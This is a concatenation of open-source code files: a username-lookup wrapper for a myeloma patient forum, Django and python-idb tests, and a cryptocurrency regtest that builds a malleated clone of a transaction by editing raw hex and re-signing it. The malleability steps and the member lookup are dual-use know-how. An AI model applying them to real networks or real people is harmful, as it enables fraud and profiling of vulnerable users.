self.url["usufy"] = "http://forum.myeloma.org.uk/members/" + "<usufy>" #self.url["searchfy"] = "http://anyurl.com/search/" + "<searchfy>" ###################################### # Whether the user needs credentials # ###################################### self.needsCredentials = {} #self.needsCredentials["phonefy"] = False self.needsCredentials["usufy"] = False #self.needsCredentials["searchfy"] = False ################# # Valid queries # ################# # Strings that will imply that the query number is not appearing self.validQuery = {} # The regular expression '.+' will match any query. #self.validQuery["phonefy"] = ".*" self.validQuery["usufy"] = ".+" #self.validQuery["searchfy"] = ".*" ################### # Not_found clues # ################### # Strings that will imply that the query number is not appearing self.notFoundText = {} #self.notFoundText["phonefy"] = [] self.notFoundText["usufy"] = ["error404 no-js"] #self.notFoundText["searchfy"] = [] ######################### # Fields to be searched # ######################### self.fieldsRegExp = {} # Definition of regular expressions to be searched in phonefy mode #self.fieldsRegExp["phonefy"] = {} # Example of fields: #self.fieldsRegExp["phonefy"]["i3visio.location"] = "" # Definition of regular expressions to be searched in usufy mode self.fieldsRegExp["usufy"] = {} # Example of fields: #self.fieldsRegExp["usufy"]["i3visio.location"] = "" # Definition of regular expressions to be searched in searchfy mode #self.fieldsRegExp["searchfy"] = {} # Example of fields: #self.fieldsRegExp["searchfy"]["i3visio.location"] = "" ################ # Fields found # ################ # This attribute will be feeded when running the program. self.foundFields = {}
agpl-3.0
tayfun/django
tests/template_tests/filter_tests/test_filesizeformat.py
306
2495
from __future__ import unicode_literals from django.template.defaultfilters import filesizeformat from django.test import SimpleTestCase from django.utils import translation class FunctionTests(SimpleTestCase): def test_formats(self): self.assertEqual(filesizeformat(1023), '1023\xa0bytes') self.assertEqual(filesizeformat(1024), '1.0\xa0KB') self.assertEqual(filesizeformat(10 * 1024), '10.0\xa0KB') self.assertEqual(filesizeformat(1024 * 1024 - 1), '1024.0\xa0KB') self.assertEqual(filesizeformat(1024 * 1024), '1.0\xa0MB') self.assertEqual(filesizeformat(1024 * 1024 * 50), '50.0\xa0MB') self.assertEqual(filesizeformat(1024 * 1024 * 1024 - 1), '1024.0\xa0MB') self.assertEqual(filesizeformat(1024 * 1024 * 1024), '1.0\xa0GB') self.assertEqual(filesizeformat(1024 * 1024 * 1024 * 1024), '1.0\xa0TB') self.assertEqual(filesizeformat(1024 * 1024 * 1024 * 1024 * 1024), '1.0\xa0PB') self.assertEqual(filesizeformat(1024 * 1024 * 1024 * 1024 * 1024 * 2000), '2000.0\xa0PB') self.assertEqual(filesizeformat(complex(1, -1)), '0\xa0bytes') self.assertEqual(filesizeformat(""), '0\xa0bytes') self.assertEqual(filesizeformat("\N{GREEK SMALL LETTER ALPHA}"), '0\xa0bytes') def test_localized_formats(self): with self.settings(USE_L10N=True), translation.override('de'): self.assertEqual(filesizeformat(1023), '1023\xa0Bytes') self.assertEqual(filesizeformat(1024), '1,0\xa0KB') self.assertEqual(filesizeformat(10 * 1024), '10,0\xa0KB') self.assertEqual(filesizeformat(1024 * 1024 - 1), '1024,0\xa0KB') self.assertEqual(filesizeformat(1024 * 1024), '1,0\xa0MB') self.assertEqual(filesizeformat(1024 * 1024 * 50), '50,0\xa0MB') self.assertEqual(filesizeformat(1024 * 1024 * 1024 - 1), '1024,0\xa0MB') self.assertEqual(filesizeformat(1024 * 1024 * 1024), '1,0\xa0GB') self.assertEqual(filesizeformat(1024 * 1024 * 1024 * 1024), '1,0\xa0TB') self.assertEqual(filesizeformat(1024 * 1024 * 1024 * 1024 * 1024), '1,0\xa0PB') self.assertEqual(filesizeformat(1024 * 1024 * 1024 * 1024 * 1024 * 2000), '2000,0\xa0PB') self.assertEqual(filesizeformat(complex(1, -1)), '0\xa0Bytes') self.assertEqual(filesizeformat(""), '0\xa0Bytes') self.assertEqual(filesizeformat("\N{GREEK SMALL LETTER ALPHA}"), '0\xa0Bytes')
bsd-3-clause
williballenthin/python-idb
tests/test_idb.py
1
24692
import binascii import idb.fileformat import idb.netnode from fixtures import * def h2b(somehex): """ convert the given hex string into bytes. binascii.unhexlify is many more characters to type :-). """ return binascii.unhexlify(somehex) def b2h(somebytes): """ convert the given bytes into a hex *string*. binascii.hexlify returns a bytes, which is slightly annoying. also, its many more characters to type. """ return binascii.hexlify(somebytes).decode("ascii") def h(number): """ convert a number to a hex representation, with no leading '0x'. Example:: assert h(16) == '10' assert hex(16) == '0x10' """ return "%02x" % number @kern32_test( [(695, 32, 4), (695, 64, 8), (700, 32, 4), (700, 64, 8),] ) def test_wordsize(kernel32_idb, version, bitness, expected): assert kernel32_idb.wordsize == expected @kern32_test( [(695, 32, None), (695, 64, None), (700, 32, None), (700, 64, None),] ) def test_validate(kernel32_idb, version, bitness, expected): # should be no ValueErrors here. assert kernel32_idb.validate() is True def do_test_compressed(db): for section in db.sections: if section is None: continue assert section.header.is_compressed is True assert ( section.header.compression_method == idb.fileformat.COMPRESSION_METHOD.ZLIB ) # should be no ValueErrors here. assert db.validate() is True def test_compressed(compressed_idb, compressed_i64): do_test_compressed(compressed_idb) do_test_compressed(compressed_i64) @kern32_test( [(695, 32, b"IDA1"), (695, 64, b"IDA2"), (700, 32, b"IDA1"), (700, 64, b"IDA2"),] ) def test_header_magic(kernel32_idb, version, bitness, expected): assert kernel32_idb.header.signature == expected assert kernel32_idb.header.sig2 == 0xAABBCCDD @kern32_test( [(695, 32, 0x2000), (695, 64, 0x2000), (700, 32, 0x2000), (700, 64, 0x2000),] ) def test_id0_page_size(kernel32_idb, version, bitness, expected): assert kernel32_idb.id0.page_size == expected @kern32_test( [(695, 32, 0x1), (695, 64, 0x1), (700, 32, 0x1), (700, 64, 0x1),] ) def test_id0_root_page(kernel32_idb, version, bitness, expected): assert kernel32_idb.id0.root_page == expected @kern32_test( [ # collected empirically (695, 32, 1592), (695, 64, 1979), (700, 32, 1566), (700, 64, 1884), ] ) def test_id0_page_count(kernel32_idb, version, bitness, expected): assert kernel32_idb.id0.page_count == expected @kern32_test( [ # collected empirically (695, 32, 422747), (695, 64, 422753), (700, 32, 426644), (700, 64, 426647), ] ) def test_id0_record_count(kernel32_idb, version, bitness, expected): assert kernel32_idb.id0.record_count == expected @kern32_test( [(695, 32, None), (695, 64, None), (700, 32, None), (700, 64, None),] ) def test_id0_root_entries(kernel32_idb, version, bitness, expected): """ Args: expected: ignored """ for entry in kernel32_idb.id0.get_page(kernel32_idb.id0.root_page).get_entries(): assert entry.key is not None @kern32_test( [ (695, 32, "24204d4158204c494e4b"), (695, 64, "24204d4158204c494e4b"), (700, 32, "24204d4158204c494e4b"), (700, 64, "24204d4158204c494e4b"), ] ) def test_cursor_min(kernel32_idb, version, bitness, expected): # test cursor movement from min key # min leaf keys: # 24204d4158204c494e4b # 24204d4158204e4f4445 # 24204e45542044455343 # 2e0000000044689ae208 minkey = kernel32_idb.id0.get_min().key assert minkey == h2b(expected) cursor = kernel32_idb.id0.find(minkey) cursor.next() assert b2h(cursor.key) == "24204d4158204e4f4445" cursor.prev() assert b2h(cursor.key) == "24204d4158204c494e4b" with pytest.raises(IndexError): cursor.prev() @kern32_test( [ (695, 32, "4e776373737472"), (695, 64, "4e776373737472"), (700, 32, "4e776373737472"), (700, 64, "4e776373737472"), ] ) def test_cursor_max(kernel32_idb, version, bitness, expected): # test cursor movement from max key # max leaf keys: # 4e7763736e636d70 # 4e7763736e637079 # 4e7763736e6370795f73 # 4e77637372636872 # 4e776373737472 maxkey = kernel32_idb.id0.get_max().key assert maxkey == h2b(expected) cursor = kernel32_idb.id0.find(maxkey) cursor.prev() assert b2h(cursor.key) == "4e77637372636872" cursor.next() assert b2h(cursor.key) == "4e776373737472" with pytest.raises(IndexError): cursor.next() @kern32_test( [(695, 32, None), (700, 32, None),] ) def test_find_exact_match1(kernel32_idb, version, bitness, expected): # this is found in the root node, first index key = h2b("2e6892663778689c4fb7") assert kernel32_idb.id0.find(key).key == key assert b2h(kernel32_idb.id0.find(key).value) == "13" @kern32_test( [(695, 32, None), (700, 32, None),] ) def test_find_exact_match2(kernel32_idb, version, bitness, expected): # this is found in the second level, third index key = h2b("2e689017765300000009") assert kernel32_idb.id0.find(key).key == key assert b2h(kernel32_idb.id0.find(key).value) == "02" @kern32_test( [ (695, 32, "24204636383931344133462e6c705375624b6579"), (700, 32, "24204636383931344132452e6c705265736572766564"), ] ) def test_find_exact_match3(kernel32_idb, version, bitness, expected): # this is found in the root node, last index. key = h2b("2eff001bc44e") assert kernel32_idb.id0.find(key).key == key assert b2h(kernel32_idb.id0.find(key).value) == expected @kern32_test( [(695, 32, None), (700, 32, None),] ) def test_find_exact_match4(kernel32_idb, version, bitness, expected): # this is found on a leaf node, first index key = h2b("2e6890142c5300001000") assert kernel32_idb.id0.find(key).key == key assert b2h(kernel32_idb.id0.find(key).value) == "01080709" @kern32_test( [(695, 32, None), (700, 32, None),] ) def test_find_exact_match5(kernel32_idb, version, bitness, expected): # this is found on a leaf node, fourth index key = h2b("2e689a288c530000000a") assert kernel32_idb.id0.find(key).key == key assert b2h(kernel32_idb.id0.find(key).value) == "02" @kern32_test( [(695, 32, None), (700, 32, None),] ) def test_find_exact_match6(kernel32_idb, version, bitness, expected): # this is found on a leaf node, last index key = h2b("2e6890157f5300000009") assert kernel32_idb.id0.find(key).key == key assert b2h(kernel32_idb.id0.find(key).value) == "02" @kern32_test() def test_find_exact_match_min(kernel32_idb, version, bitness, expected): minkey = h2b("24204d4158204c494e4b") assert kernel32_idb.id0.find(minkey).key == minkey @kern32_test() def test_find_exact_match_max(kernel32_idb, version, bitness, expected): if 500 < version <= 700: maxkey = h2b("4e776373737472") assert kernel32_idb.id0.find(maxkey).key == maxkey @kern32_test() def test_find_exact_match_error(kernel32_idb, version, bitness, expected): # check our error handling with pytest.raises(KeyError): kernel32_idb.id0.find(b"does not exist!") @kern32_test([(695, 32, None)]) def test_find_prefix(kernel32_idb, version, bitness, expected): # nodeid: ff000006 ($fixups) fixup_nodeid = "2eff000006" key = h2b(fixup_nodeid) # the first match is the N (name) tag cursor = kernel32_idb.id0.find_prefix(key) assert b2h(cursor.key) == fixup_nodeid + h(ord("N")) # nodeid: ff000006 ($fixups) tag: S supvals = fixup_nodeid + h(ord("S")) key = h2b(supvals) # the first match is for index 0x68901025 cursor = kernel32_idb.id0.find_prefix(key) assert b2h(cursor.key) == fixup_nodeid + h(ord("S")) + "68901025" with pytest.raises(KeyError): cursor = kernel32_idb.id0.find_prefix(b"does not exist") @kern32_test() def test_find_prefix2(kernel32_idb, version, bitness, expected): """ this test is derived from some issues encountered while doing import analysis. ultimately, we're checking prefix matching when the first match is found in a branch node. """ impnn = idb.netnode.Netnode(kernel32_idb, "$ imports") expected_alts = list(range(0x30)) expected_alts.append(kernel32_idb.uint(-1)) assert list(impnn.alts()) == expected_alts assert list(impnn.sups()) == list(range(0x30)) # capture the number of supvals in each netnode referenced from the import netnode dist = [] for alt in impnn.alts(): if alt == kernel32_idb.uint(-1): break ref = idb.netnode.as_uint(impnn.get_val(alt, tag="A")) nn = idb.netnode.Netnode(kernel32_idb, ref) dist.append((alt, len(list(nn.sups())))) # this distribution was collected empirically. # the import analysis is correct (verified in IDA), so by extension, this should be correct as well. assert dist == [ (0, 4), (1, 388), (2, 77), (3, 50), (4, 42), (5, 13), (6, 28), (7, 4), (8, 33), (9, 68), (10, 1), (11, 9), (12, 1), (13, 7), (14, 1), (15, 24), (16, 9), (17, 6), (18, 26), (19, 9), (20, 54), (21, 24), (22, 8), (23, 9), (24, 7), (25, 5), (26, 1), (27, 2), (28, 26), (29, 1), (30, 18), (31, 5), (32, 3), (33, 2), (34, 3), (35, 6), (36, 11), (37, 11), (38, 5), (39, 6), (40, 11), (41, 7), (42, 10), (43, 14), (44, 38), (45, 16), (46, 6), (47, 7), ] @kern32_test([(695, 32, None)]) def test_cursor_easy_leaf(kernel32_idb, version, bitness, expected): # this is found on a leaf, second to last index. # here's the surrounding layout: # # 00:00: 2eff00002253689cc95b = ff689cc95b40ff8000c00bd30201 # > 00:01: 2eff00002253689cc99b = ff689cc99b32ff8000c00be35101 # 00:00: 2eff00002253689cc9cd = ff689cc9cd2bff8000c00be12f01 key = h2b("2eff00002253689cc99b") cursor = kernel32_idb.id0.find(key) cursor.next() assert b2h(cursor.key) == "2eff00002253689cc9cd" cursor.prev() cursor.prev() assert b2h(cursor.key) == "2eff00002253689cc95b" @kern32_test([(695, 32, None)]) def test_cursor_branch(kernel32_idb, version, bitness, expected): # starting at a key that is found in a branch node, test next and prev. # these should traverse to leaf nodes and pick the min/max entries, respectively. # # 576 contents (branch): # ... # 000638: 2eff00002253689b9535 = ff689b953573ff441098aa0c040c16000000000000 # > 000639: 2eff00002253689bea8e = ff689bea8e8257ff8000c00aa2c601 # 00000e: 2eff00002253689ccaf1 = ff689ccaf113ff8000c00be25301 # ... # # 638 contents (leaf): # 00:00: 2eff00002253689b95db = ff689b95db54ff441098ad08040c14000000000000 # 00:01: 2eff00002253689b9665 = ff689b96655bff441098b008040815000000000000 # 00:00: 2eff00002253689b970f = ff689b970f808bff441098b30804141f000000000000 # ... # 00:01: 2eff00002253689be79b = ff689be79b1bff8000c00a9d4b01 # 00:00: 2eff00002253689be7b6 = ff689be7b68270ff8000c00af6a101 # > 00:00: 2eff00002253689bea26 = ff689bea2668ff8000c00a9f4301 # # # 639 contents (leaf): # > 00:00: 2eff00002253689bece5 = ff689bece514ff8000c00bc6b701 # 00:00: 2eff00002253689becf9 = ff689becf942ff8000c008cf9e01 # 00:00: 2eff00002253689bed3b = ff689bed3b42ff8000c0090b9c01 # ... # 00:00: 2eff00002253689cc95b = ff689cc95b40ff8000c00bd30201 # 00:01: 2eff00002253689cc99b = ff689cc99b32ff8000c00be35101 # 00:00: 2eff00002253689cc9cd = ff689cc9cd2bff8000c00be12f01 key = h2b("2eff00002253689bea8e") cursor = kernel32_idb.id0.find(key) cursor.next() assert b2h(cursor.key) == "2eff00002253689bece5" key = h2b("2eff00002253689bea8e") cursor = kernel32_idb.id0.find(key) cursor.prev() assert b2h(cursor.key) == "2eff00002253689bea26" @kern32_test([(695, 32, None)]) def test_cursor_complex_leaf_next(kernel32_idb, version, bitness, expected): # see the scenario in `test_cursor_branch`. key = h2b("2eff00002253689bea26") cursor = kernel32_idb.id0.find(key) cursor.next() assert b2h(cursor.key) == "2eff00002253689bea8e" @kern32_test([(695, 32, None)]) def test_cursor_complex_leaf_prev(kernel32_idb, version, bitness, expected): # see the scenario in `test_cursor_branch`. key = h2b("2eff00002253689bece5") cursor = kernel32_idb.id0.find(key) cursor.prev() assert b2h(cursor.key) == "2eff00002253689bea8e" @pytest.mark.slow @kern32_test() def test_cursor_enum_all_asc(kernel32_idb, version, bitness, expected): minkey = kernel32_idb.id0.get_min().key cursor = kernel32_idb.id0.find(minkey) count = 1 while True: try: cursor.next() except IndexError: break count += 1 assert kernel32_idb.id0.record_count == count @pytest.mark.slow @kern32_test() def test_cursor_enum_all_desc(kernel32_idb, version, bitness, expected): maxkey = kernel32_idb.id0.get_max().key cursor = kernel32_idb.id0.find(maxkey) count = 1 while True: try: cursor.prev() except IndexError: break count += 1 assert kernel32_idb.id0.record_count == count @kern32_test( [(695, 32, None), (695, 64, None), (700, 32, None), (700, 64, None),] ) def test_id1(kernel32_idb, version, bitness, expected): id1 = kernel32_idb.id1 segments = id1.segments # collected empirically assert len(segments) == 2 for segment in segments: assert segment.bounds.start < segment.bounds.end assert segments[0].bounds.start == 0x68901000 assert segments[1].bounds.start == 0x689DD000 assert id1.get_segment(0x68901000).bounds.start == 0x68901000 assert id1.get_segment(0x68901001).bounds.start == 0x68901000 assert id1.get_segment(0x689DC000 - 1).bounds.start == 0x68901000 assert id1.get_next_segment(0x68901000).bounds.start == 0x689DD000 assert id1.get_flags(0x68901000) == 0x2590 def test_id1_2(elf_idb): assert list(map(lambda s: s.offset, elf_idb.id1.segments)) == [ 0x0, 0x8C, 0x1CEC, 0x47E4C, 0x7382C, 0x7385C, 0x73F9C, ] @kern32_test( [ # collected empirically (695, 32, 14252), (695, 64, 14252), (700, 32, 14247), (700, 64, 14247), ] ) def test_nam_name_count(kernel32_idb, version, bitness, expected): assert kernel32_idb.nam.name_count == expected @kern32_test( [ # collected empirically (695, 32, 8), (695, 64, 15), (700, 32, 8), (700, 64, 15), ] ) def test_nam_page_count(kernel32_idb, version, bitness, expected): assert kernel32_idb.nam.page_count == expected nam = kernel32_idb.nam if bitness == 32: assert nam.name_count < len(nam.buffer) elif bitness == 64: assert nam.name_count < len(nam.buffer) @kern32_test( [ # collected empirically (695, 32, 14252), (695, 64, 14252), (700, 32, 14247), (700, 64, 14247), ] ) def test_nam_names(kernel32_idb, version, bitness, expected): names = kernel32_idb.nam.names() assert len(names) == expected assert names[0] == 0x68901010 assert names[-1] == 0x689DE228 @kern32_test( [(695, 32, None), (695, 64, None), (700, 32, None), (700, 64, None),] ) def test_til(kernel32_idb, version, bitness, expected): til = kernel32_idb.til assert til.signature == "IDATIL" assert til.size_i == 4 assert til.size_b == 1 assert til.size_e == 4 syms = til.syms.defs types = til.types.defs assert len(types) == 106 assert len(syms) == 61 # 1 GUID typedef _GUID assert types[0].name == "GUID" # 2 # struct _GUID # { # unsigned __int32 Data1; # unsigned __int16 Data2; # unsigned __int16 Data3; # unsigned __int8 Data4[8]; # }; assert types[1].name == "_GUID" assert types[1].fields == ["Data1", "Data2", "Data3", "Data4"] # TODO: don't known how to use the type_info field # assert types[0].type_info == '\x0d!$##\x1b\x09"' # 5 JOBOBJECTINFOCLASS typedef _JOBOBJECTINFOCLASS assert types[4].name == "JOBOBJECTINFOCLASS" # 6 # enum _JOBOBJECTINFOCLASS # { # JobObjectBasicAccountingInformation = 0x1, # JobObjectBasicLimitInformation = 0x2, # JobObjectBasicProcessIdList = 0x3, # JobObjectBasicUIRestrictions = 0x4, # JobObjectSecurityLimitInformation = 0x5, # JobObjectEndOfJobTimeInformation = 0x6, # JobObjectAssociateCompletionPortInformation = 0x7, # MaxJobObjectInfoClass = 0x8, # }; assert types[5].name == "_JOBOBJECTINFOCLASS" assert types[5].fields == [ "JobObjectBasicAccountingInformation", "JobObjectBasicLimitInformation", "JobObjectBasicProcessIdList", "JobObjectBasicUIRestrictions", "JobObjectSecurityLimitInformation", "JobObjectEndOfJobTimeInformation", "JobObjectAssociateCompletionPortInformation", "MaxJobObjectInfoClass", ] assert syms[0].name == "JobObjectBasicAccountingInformation" assert syms[1].name == "JobObjectBasicLimitInformation" assert syms[2].name == "JobObjectBasicProcessIdList" assert syms[3].name == "JobObjectBasicUIRestrictions" assert syms[4].name == "JobObjectSecurityLimitInformation" assert syms[5].name == "JobObjectEndOfJobTimeInformation" assert syms[6].name == "JobObjectAssociateCompletionPortInformation" assert syms[7].name == "MaxJobObjectInfoClass" assert syms[0].ordinal == 0x1 assert syms[1].ordinal == 0x2 assert syms[2].ordinal == 0x3 assert syms[3].ordinal == 0x4 assert syms[4].ordinal == 0x5 assert syms[5].ordinal == 0x6 assert syms[6].ordinal == 0x7 assert syms[7].ordinal == 0x8 assert syms[0].type_info == b"=\x14_JOBOBJECTINFOCLASS" assert syms[1].type_info == b"=\x14_JOBOBJECTINFOCLASS" assert syms[2].type_info == b"=\x14_JOBOBJECTINFOCLASS" assert syms[3].type_info == b"=\x14_JOBOBJECTINFOCLASS" assert syms[4].type_info == b"=\x14_JOBOBJECTINFOCLASS" assert syms[5].type_info == b"=\x14_JOBOBJECTINFOCLASS" assert syms[6].type_info == b"=\x14_JOBOBJECTINFOCLASS" assert syms[7].type_info == b"=\x14_JOBOBJECTINFOCLASS" # 59 ULARGE_INTEGER typedef _ULARGE_INTEGER assert types[58].name == "ULARGE_INTEGER" # 60 # union _ULARGE_INTEGER # { # struct # { # DWORD LowPart; # DWORD HighPart; # }; # _ULARGE_INTEGER::$0354AA9C204208F00D0965D07BBE7FAC u; # ULONGLONG QuadPart; # }; assert types[59].name == "_ULARGE_INTEGER" assert types[59].fields == [ "u", "QuadPart", ] # 61 # struct _ULARGE_INTEGER::$0354AA9C204208F00D0965D07BBE7FAC # { # DWORD LowPart; # DWORD HighPart; # }; assert types[60].name == "_ULARGE_INTEGER::$0354AA9C204208F00D0965D07BBE7FAC" assert types[60].fields == [ "LowPart", "HighPart", ] def test_til_affix(): cd = os.path.dirname(__file__) idbpath = os.path.join(cd, "data", "til", "TILTest.dll.i64") with idb.from_file(idbpath) as db: til = db.til assert til.signature == "IDATIL" assert til.size_i == 4 assert til.size_b == 1 assert til.size_e == 4 syms = til.syms.defs types = til.types.defs # 24 # class Base { # public: # Base(const int32_t field0, const int32_t field1, const int32_t field2) # : field0_{field0}, # field1_{field1}, # field2_{field2} { # } # # int32_t field0_, field1_, field2_; # # int32_t foo() const { return field0_ + field1_; } # # int32_t bar() const { return field1_ + field2_; } # }; base = types[23] assert base.name == "Base" assert base.fields == [ "field0_", "field1_", "field2_", ] assert base.type.is_struct() base_members = base.type.type_details.members assert base_members[0].type.is_int() assert base_members[1].type.is_int() assert base_members[2].type.is_int() # 25 # class Derive : Base { # public: # Derive(const int32_t field0, const int32_t field1, const int32_t field2, int32_t field3, int32_t field4, # int32_t field5) : Base(field0, field1, field2), field3_(field3), field4_(field4), field5_(field5) {} # # int32_t field3_, field4_, field5_; # }; derive = types[24] assert derive.name == "Derive" assert derive.fields == [ "field3_", "field4_", "field5_", ] assert derive.type.is_struct() derive_members = derive.type.type_details.members assert derive_members[0].is_baseclass() assert ( derive_members[0].type.get_final_tinfo().get_name() == base.type.get_name() ) assert derive_members[1].type.is_int() assert derive_members[2].type.is_int() assert derive_members[3].type.is_int() # struct Outside { # struct { # std::string field0, field1, field2; # } inside; # # std::string foo; # std::string bar; # }; # 34 t34 = types[33] assert t34.name == "Outside::<unnamed_type_inside>" assert t34.fields == [ "field0", "field1", "field2", ] assert t34.type.is_struct() # 35 t35 = types[34] assert t35.name == "Outside" assert t35.fields == [ "inside", "foo", "bar", ] assert t35.type.is_struct() members = t35.type.type_details.members assert members[0].type.get_final_tinfo().is_struct() # class Sorter { # public: # virtual int compare(const void *first, const void *second) = 0; # }; # 52 t52 = types[51] assert t52.name == "Sorter" assert t52.fields == [ "__vftable", ] assert t52.type.is_struct() t52_typ = t52.type.type_details.members[0].type assert t52_typ.is_ptr() assert t52_typ.get_pointed_object().is_decl_typedef() assert t52_typ.get_pointed_object().get_final_tinfo().is_struct() # 53 t53 = types[52] assert t53.name == "Sorter_vtbl" assert t53.fields == [ "compare", "this", ] assert t53.type.is_struct() # 209 # PTP_CLEANUP_GROUP_CANCEL_CALLBACK typedef void (__fastcall *)(void *, void *) # t209 = types[208] assert t209.name == "PTP_CLEANUP_GROUP_CANCEL_CALLBACK" assert t209.type.is_funcptr() assert ( t209.type.get_typestr() == "void (__fastcall *PTP_CLEANUP_GROUP_CANCEL_CALLBACK)(void*, void*)" ) # 79 # _TP_CALLBACK_ENVIRON_V3::<unnamed_type_u>::<unnamed_type_s> # struct # { # unsigned __int32 LongFunction : 1; # unsigned __int32 Persistent : 1; # unsigned __int32 Private : 30; # } assert ( types[78].type.get_typestr() == """struct _TP_CALLBACK_ENVIRON_V3::<unnamed_type_u>::<unnamed_type_s> { unsigned int32 LongFunction : 1; unsigned int32 Persistent : 1; unsigned int32 Private : 30; }""" ) # 115 # _TypeDescriptor # struct # { # const void *pVFTable; # void *spare; # char name[]; # } assert ( types[114].type.get_typestr() == """struct _TypeDescriptor { void* pVFTable; void* spare; int8[] name; }""" )
apache-2.0
Kore-Core/kore
qa/rpc-tests/txn_clone.py
1
7951
#!/usr/bin/env python3 # Copyright (c) 2014-2016 The Kore Core developers # Distributed under the MIT software license, see the accompanying # file COPYING or http://www.opensource.org/licenses/mit-license.php. # # Test proper accounting with an equivalent malleability clone # from test_framework.test_framework import KoreTestFramework from test_framework.util import * class TxnMallTest(KoreTestFramework): def add_options(self, parser): parser.add_option("--mineblock", dest="mine_block", default=False, action="store_true", help="Test double-spend of 1-confirmed transaction") def setup_network(self): # Start with split network: return super(TxnMallTest, self).setup_network(True) def run_test(self): # All nodes should start with 1,250 BTC: starting_balance = 1250 for i in range(4): assert_equal(self.nodes[i].getbalance(), starting_balance) self.nodes[i].getnewaddress("") # bug workaround, coins generated assigned to first getnewaddress! # Assign coins to foo and bar accounts: self.nodes[0].settxfee(.001) node0_address_foo = self.nodes[0].getnewaddress("foo") fund_foo_txid = self.nodes[0].sendfrom("", node0_address_foo, 1219) fund_foo_tx = self.nodes[0].gettransaction(fund_foo_txid) node0_address_bar = self.nodes[0].getnewaddress("bar") fund_bar_txid = self.nodes[0].sendfrom("", node0_address_bar, 29) fund_bar_tx = self.nodes[0].gettransaction(fund_bar_txid) assert_equal(self.nodes[0].getbalance(""), starting_balance - 1219 - 29 + fund_foo_tx["fee"] + fund_bar_tx["fee"]) # Coins are sent to node1_address node1_address = self.nodes[1].getnewaddress("from0") # Send tx1, and another transaction tx2 that won't be cloned txid1 = self.nodes[0].sendfrom("foo", node1_address, 40, 0) txid2 = self.nodes[0].sendfrom("bar", node1_address, 20, 0) # Construct a clone of tx1, to be malleated rawtx1 = self.nodes[0].getrawtransaction(txid1,1) clone_inputs = [{"txid":rawtx1["vin"][0]["txid"],"vout":rawtx1["vin"][0]["vout"]}] clone_outputs = {rawtx1["vout"][0]["scriptPubKey"]["addresses"][0]:rawtx1["vout"][0]["value"], rawtx1["vout"][1]["scriptPubKey"]["addresses"][0]:rawtx1["vout"][1]["value"]} clone_raw = self.nodes[0].createrawtransaction(clone_inputs, clone_outputs) # 3 hex manipulations on the clone are required # manipulation 1. sequence is at version+#inputs+input+sigstub posseq = 2*(4+1+36+1) seqbe = '%08x' % rawtx1["vin"][0]["sequence"] clone_raw = clone_raw[:posseq] + seqbe[6:8] + seqbe[4:6] + seqbe[2:4] + seqbe[0:2] + clone_raw[posseq + 8:] # manipulation 2. createrawtransaction randomizes the order of its outputs, so swap them if necessary. # output 0 is at version+#inputs+input+sigstub+sequence+#outputs # 40 BTC serialized is 00286bee00000000 pos0 = 2*(4+1+36+1+4+1) hex40 = "00286bee00000000" output_len = 16 + 2 + 2 * int("0x" + clone_raw[pos0 + 16 : pos0 + 16 + 2], 0) if (rawtx1["vout"][0]["value"] == 40 and clone_raw[pos0 : pos0 + 16] != hex40 or rawtx1["vout"][0]["value"] != 40 and clone_raw[pos0 : pos0 + 16] == hex40): output0 = clone_raw[pos0 : pos0 + output_len] output1 = clone_raw[pos0 + output_len : pos0 + 2 * output_len] clone_raw = clone_raw[:pos0] + output1 + output0 + clone_raw[pos0 + 2 * output_len:] # manipulation 3. locktime is after outputs poslt = pos0 + 2 * output_len ltbe = '%08x' % rawtx1["locktime"] clone_raw = clone_raw[:poslt] + ltbe[6:8] + ltbe[4:6] + ltbe[2:4] + ltbe[0:2] + clone_raw[poslt + 8:] # Use a different signature hash type to sign. This creates an equivalent but malleated clone. # Don't send the clone anywhere yet tx1_clone = self.nodes[0].signrawtransaction(clone_raw, None, None, "ALL|ANYONECANPAY") assert_equal(tx1_clone["complete"], True) # Have node0 mine a block, if requested: if (self.options.mine_block): self.nodes[0].generate(1) sync_blocks(self.nodes[0:2]) tx1 = self.nodes[0].gettransaction(txid1) tx2 = self.nodes[0].gettransaction(txid2) # Node0's balance should be starting balance, plus 50BTC for another # matured block, minus tx1 and tx2 amounts, and minus transaction fees: expected = starting_balance + fund_foo_tx["fee"] + fund_bar_tx["fee"] if self.options.mine_block: expected += 50 expected += tx1["amount"] + tx1["fee"] expected += tx2["amount"] + tx2["fee"] assert_equal(self.nodes[0].getbalance(), expected) # foo and bar accounts should be debited: assert_equal(self.nodes[0].getbalance("foo", 0), 1219 + tx1["amount"] + tx1["fee"]) assert_equal(self.nodes[0].getbalance("bar", 0), 29 + tx2["amount"] + tx2["fee"]) if self.options.mine_block: assert_equal(tx1["confirmations"], 1) assert_equal(tx2["confirmations"], 1) # Node1's "from0" balance should be both transaction amounts: assert_equal(self.nodes[1].getbalance("from0"), -(tx1["amount"] + tx2["amount"])) else: assert_equal(tx1["confirmations"], 0) assert_equal(tx2["confirmations"], 0) # Send clone and its parent to miner self.nodes[2].sendrawtransaction(fund_foo_tx["hex"]) txid1_clone = self.nodes[2].sendrawtransaction(tx1_clone["hex"]) # ... mine a block... self.nodes[2].generate(1) # Reconnect the split network, and sync chain: connect_nodes(self.nodes[1], 2) self.nodes[2].sendrawtransaction(fund_bar_tx["hex"]) self.nodes[2].sendrawtransaction(tx2["hex"]) self.nodes[2].generate(1) # Mine another block to make sure we sync sync_blocks(self.nodes) # Re-fetch transaction info: tx1 = self.nodes[0].gettransaction(txid1) tx1_clone = self.nodes[0].gettransaction(txid1_clone) tx2 = self.nodes[0].gettransaction(txid2) # Verify expected confirmations assert_equal(tx1["confirmations"], -2) assert_equal(tx1_clone["confirmations"], 2) assert_equal(tx2["confirmations"], 1) # Check node0's total balance; should be same as before the clone, + 100 BTC for 2 matured, # less possible orphaned matured subsidy expected += 100 if (self.options.mine_block): expected -= 50 assert_equal(self.nodes[0].getbalance(), expected) assert_equal(self.nodes[0].getbalance("*", 0), expected) # Check node0's individual account balances. # "foo" should have been debited by the equivalent clone of tx1 assert_equal(self.nodes[0].getbalance("foo"), 1219 + tx1["amount"] + tx1["fee"]) # "bar" should have been debited by (possibly unconfirmed) tx2 assert_equal(self.nodes[0].getbalance("bar", 0), 29 + tx2["amount"] + tx2["fee"]) # "" should have starting balance, less funding txes, plus subsidies assert_equal(self.nodes[0].getbalance("", 0), starting_balance - 1219 + fund_foo_tx["fee"] - 29 + fund_bar_tx["fee"] + 100) # Node1's "from0" account balance assert_equal(self.nodes[1].getbalance("from0", 0), -(tx1["amount"] + tx2["amount"])) if __name__ == '__main__': TxnMallTest().main()
mit
pathak22/corr_clustering
src/random_geom_model.py
1
4416
